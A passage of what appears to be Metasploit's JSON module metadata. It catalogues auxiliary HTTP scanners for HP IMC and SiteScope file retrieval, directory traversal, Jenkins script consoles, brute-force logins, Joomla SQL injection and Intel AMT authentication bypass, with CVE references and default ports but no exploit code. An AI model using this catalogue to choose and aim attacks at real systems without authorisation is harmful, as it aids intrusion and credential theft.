"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the ReportImgServlt, in order to retrieve\n arbitrary files with SYSTEM privileges. This module has been tested successfully on\n HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5203",
"OSVDB-91028",
"BID-58672",
"ZDI-13-052"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_reportimgservlt_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_som_file_download": {
"name": "HP Intelligent Management SOM FileDownloadServlet Arbitrary Download",
"full_name": "auxiliary/scanner/http/hp_imc_som_file_download",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the FileDownloadServlet from the SOM component, in order to\n retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully\n on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.",
"references": [
"CVE-2013-4826",
"OSVDB-98251",
"BID-62898",
"ZDI-13-242"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_som_file_download",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sitescope_getfileinternal_fileaccess": {
"name": "HP SiteScope SOAP Call getFileInternal Remote File Access",
"full_name": "auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in HP SiteScope to\n retrieve an arbitrary file from the remote server. It is accomplished by calling\n the getFileInternal operation available through the APISiteScopeImpl AXIS service.\n This module has been successfully tested on HP SiteScope 11.20 over Windows 2003\n SP2 and Linux Centos 6.3.",
"references": [
"OSVDB-85119",
"BID-55269",
"ZDI-12-176"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sitescope_getsitescopeconfiguration": {
"name": "HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access",
"full_name": "auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in HP SiteScope\n which allows to retrieve the HP SiteScope configuration, including administrative\n credentials. It is accomplished by calling the getSiteScopeConfiguration operation\n available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration\n is retrieved as file containing Java serialization data. This module has been\n tested successfully on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos\n 6.3.",
"references": [
"OSVDB-85120",
"BID-55269",
"ZDI-12-173"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sitescope_loadfilecontent_fileaccess": {
"name": "HP SiteScope SOAP Call loadFileContent Remote File Access",
"full_name": "auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in HP SiteScope to\n retrieve an arbitrary text file from the remote server. It is accomplished by\n calling the loadFileContent operation available through the APIMonitorImpl AXIS\n service. This module has been successfully tested on HP SiteScope 11.20 over\n Windows 2003 SP2 and Linux Centos 6.3.",
"references": [
"OSVDB-85118",
"BID-55269",
"ZDI-12-177"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sys_mgmt_login": {
"name": "HP System Management Homepage Login Utility",
"full_name": "auxiliary/scanner/http/hp_sys_mgmt_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to login to HP System Management Homepage using host\n operating system authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2381,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-04 13:37:11 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sys_mgmt_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_header": {
"name": "HTTP Header Detection",
"full_name": "auxiliary/scanner/http/http_header",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>",
"rick2600"
],
"description": "This module shows HTTP Headers returned by the scanned systems.",
"references": [
"URL-http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html",
"URL-http://en.wikipedia.org/wiki/List_of_HTTP_header_fields"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_header.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_header",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_hsts": {
"name": "HTTP Strict Transport Security (HSTS) Detection",
"full_name": "auxiliary/scanner/http/http_hsts",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "Display HTTP Strict Transport Security (HSTS) information about each system.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_hsts.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_hsts",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_login": {
"name": "HTTP Login Utility",
"full_name": "auxiliary/scanner/http/http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to authenticate to an HTTP service.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8081,
8444
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_put": {
"name": "HTTP Writable Path PUT/DELETE File Access",
"full_name": "auxiliary/scanner/http/http_put",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Kashif <Kashif@compulife.com.pk>",
"CG <cg@carnal0wnage.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module can abuse misconfigured web servers to upload and delete web content\n via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE.\n\n PUT is the default. If filename isn't specified, the module will generate a\n random string for you as a .txt file. If DELETE is used, a filename is required.",
"references": [
"OSVDB-397"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_put.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_put",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_sickrage_password_leak": {
"name": "HTTP SickRage Password Leak",
"full_name": "auxiliary/scanner/http/http_sickrage_password_leak",
"rank": 300,
"disclosure_date": "2018-03-08",
"type": "auxiliary",
"author": [
"Sven Fassbender",
"Shelby Pace"
],
"description": "SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP\n responses unless the user has set login information for SickRage.\n\n By default, SickRage does not require login information for the installation.",
"references": [
"CVE-2018-9160",
"EDB-44545"
],
"platform": "",
"arch": "",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-06-25 17:24:13 +0000",
"path": "/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_sickrage_password_leak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_traversal": {
"name": "Generic HTTP Directory Traversal Utility",
"full_name": "auxiliary/scanner/http/http_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ewerson Guimaraes(Crash) <crash@dclabs.com.br>",
"Michael Messner <devnull@s3cur1ty.de>",
"et <et@cyberspace.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to test if a web server (or web application) is\n vulnerable to directory traversal with three different actions.\n\n The 'CHECK' action (default) is used to automatically (or manually) find if\n directory traversal exists in the web server, and then return the path that\n triggers the vulnerability. The 'DOWNLOAD' action shares the same ability as\n 'CHECK', but will take advantage of the found trigger to download files based on\n a 'FILELIST' of your choosing. The 'PHPSOURCE' action can be used to download\n source against PHP applications. The 'WRITABLE' action can be used to determine\n if the trigger can be used to write files outside the www directory.\n\n To use the 'COOKIE' option, set your value like so: \"name=value\".",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/http_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_version": {
"name": "HTTP Version Detection",
"full_name": "auxiliary/scanner/http/http_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Display version information about each system.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/httpbl_lookup": {
"name": "Http:BL Lookup",
"full_name": "auxiliary/scanner/http/httpbl_lookup",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module can be used to enumerate information\n about an IP addresses from Project HoneyPot's HTTP Block List.",
"references": [
"URL-http://www.projecthoneypot.org/httpbl_api.php"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb",
"is_install_path": true,
"ref_name": "scanner/http/httpbl_lookup",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/httpdasm_directory_traversal": {
"name": "Httpdasm Directory Traversal",
"full_name": "auxiliary/scanner/http/httpdasm_directory_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"John Leitch",
"Shelby Pace"
],
"description": "This module allows for traversing the file system of a host running httpdasm v0.92.",
"references": [
"EDB-15861"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-06-19 14:55:53 +0000",
"path": "/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/httpdasm_directory_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/iis_internal_ip": {
"name": "Microsoft IIS HTTP Internal IP Disclosure",
"full_name": "auxiliary/scanner/http/iis_internal_ip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heather Pilkington"
],
"description": "Collect any leaked internal IPs by requesting commonly redirected locations from IIS.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb",
"is_install_path": true,
"ref_name": "scanner/http/iis_internal_ip",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/iis_shortname_scanner": {
"name": "Microsoft IIS shortname vulnerability scanner",
"full_name": "auxiliary/scanner/http/iis_shortname_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Soroush Dalili",
"Ali Abbasnejad",
"MinatoTW <shaks19jais@gmail.com>",
"egre55 <ianaustin@protonmail.com>"
],
"description": "The vulnerability is caused by a tilde character \"~\" in a GET or OPTIONS request, which\n could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili\n and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in\n 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.",
"references": [
"URL-https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability",
"URL-https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-22 09:01:11 +0000",
"path": "/modules/auxiliary/scanner/http/iis_shortname_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/iis_shortname_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/influxdb_enum": {
"name": "InfluxDB Enum Utility",
"full_name": "auxiliary/scanner/http/influxdb_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Roberto Soares Espreto <robertoespreto@gmail.com>",
"Nixawk"
],
"description": "This module enumerates databases on InfluxDB using the REST API using the\n default authentication of root:root.",
"references": [
"URL-https://docs.influxdata.com/influxdb/",
"URL-https://www.shodan.io/search?query=X-Influxdb-Version"
],
"platform": "",
"arch": "",
"rport": 8086,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-04-23 20:51:04 +0000",
"path": "/modules/auxiliary/scanner/http/influxdb_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/influxdb_enum",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/infovista_enum": {
"name": "InfoVista VistaPortal Application Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/infovista_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module attempts to scan for InfoVista VistaPortal Web Application, finds its\n version and performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/infovista_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/infovista_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/intel_amt_digest_bypass": {
"name": "Intel AMT Digest Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/http/intel_amt_digest_bypass",
"rank": 300,
"disclosure_date": "2017-05-05",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module scans for Intel Active Management Technology endpoints and attempts\n to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service\n can be found on ports 16992, 16993 (tls), 623, and 624 (tls).",
"references": [
"CVE-2017-5689",
"URL-https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability",
"URL-https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr"
],
"platform": "",
"arch": "",
"rport": 16992,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/intel_amt_digest_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ipboard_login": {
"name": "IP Board Login Auxiliary Module",
"full_name": "auxiliary/scanner/http/ipboard_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christopher Truncer chris <Christopher Truncer chris@christophertruncer.com>"
],
"description": "This module attempts to validate user provided credentials against\n an IP Board web application.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/ipboard_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jboss_status": {
"name": "JBoss Status Servlet Information Gathering",
"full_name": "auxiliary/scanner/http/jboss_status",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module queries the JBoss status servlet to collect sensitive\n information, including URL paths, GET parameters and client IP addresses.\n This module has been tested against JBoss 4.0, 4.2.2 and 4.2.3.",
"references": [
"CVE-2008-3273",
"URL-https://seclists.org/fulldisclosure/2011/Sep/139",
"URL-https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf",
"URL-http://www.slideshare.net/chrisgates/lares-fromlowtopwned"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/http/jboss_status.rb",
"is_install_path": true,
"ref_name": "scanner/http/jboss_status",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jboss_vulnscan": {
"name": "JBoss Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/jboss_vulnscan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tyler Krpata",
"Zach Grace <@ztgrace>"
],
"description": "This module scans a JBoss instance for a few vulnerabilities.",
"references": [
"CVE-2010-0738",
"CVE-2017-12149"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-13 16:10:32 +0000",
"path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
"is_install_path": true,
"ref_name": "scanner/http/jboss_vulnscan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jenkins_command": {
"name": "Jenkins-CI Unauthenticated Script-Console Scanner",
"full_name": "auxiliary/scanner/http/jenkins_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"altonjx",
"Jeffrey Cap"
],
"description": "This module scans for unauthenticated Jenkins-CI script consoles and\n executes the specified command.",
"references": [
"CVE-2015-8103",
"URL-https://jenkins.io/security/advisory/2015-11-11/",
"URL-https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/",
"URL-https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/jenkins_command.rb",
"is_install_path": true,
"ref_name": "scanner/http/jenkins_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jenkins_enum": {
"name": "Jenkins-CI Enumeration",
"full_name": "auxiliary/scanner/http/jenkins_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jeff McCutchan"
],
"description": "This module enumerates a remote Jenkins-CI installation in an unauthenticated manner, including\n host operating system and Jenkins installation details.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-01 15:32:32 +0000",
"path": "/modules/auxiliary/scanner/http/jenkins_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/jenkins_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jenkins_login": {
"name": "Jenkins-CI Login Utility",
"full_name": "auxiliary/scanner/http/jenkins_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicholas Starke <starke.nicholas@gmail.com>"
],
"description": "This module attempts to login to a Jenkins-CI instance using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8081
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/jenkins_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_bruteforce_login": {
"name": "Joomla Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/joomla_bruteforce_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"luisco100 <luisco100@gmail.com>"
],
"description": "This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_bruteforce_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_ecommercewd_sqli_scanner": {
"name": "Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner",
"rank": 300,
"disclosure_date": "2015-03-20",
"type": "auxiliary",
"author": [
"bperry"
],
"description": "This module will scan for hosts vulnerable to an unauthenticated SQL injection within the\n advanced search feature of the Web-Dorado ECommerce WD 1.2.5 and likely prior.",
"references": [
"CVE-2015-2562"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_ecommercewd_sqli_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_gallerywd_sqli_scanner": {
"name": "Gallery WD for Joomla! Unauthenticated SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/joomla_gallerywd_sqli_scanner",
"rank": 300,
"disclosure_date": "2015-03-30",
"type": "auxiliary",
"author": [
"CrashBandicoot",
"bperry"
],
"description": "This module will scan for Joomla! instances vulnerable to an unauthenticated SQL injection\n within the Gallery WD for Joomla! extension version 1.2.5 and likely prior.",
"references": [
"EDB-36563"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_gallerywd_sqli_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_pages": {
"name": "Joomla Page Scanner",
"full_name": "auxiliary/scanner/http/joomla_pages",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"newpid0"
],
"description": "This module scans a Joomla install for common pages.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-31 11:37:10 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_pages.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_pages",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_plugins": {
"name": "Joomla Plugins Scanner",
"full_name": "auxiliary/scanner/http/joomla_plugins",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"newpid0"
],
"description": "This module scans a Joomla install for plugins and potential\n vulnerabilities.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_plugins.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_plugins",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_version": {
"name": "Joomla Version Scanner",
"full_name": "auxiliary/scanner/http/joomla_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"newpid0"
],
"description": "This module scans a Joomla install for information about the underlying\n operating system and Joomla version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/kodi_traversal": {
"name": "Kodi 17.0 Local File Inclusion Vulnerability",
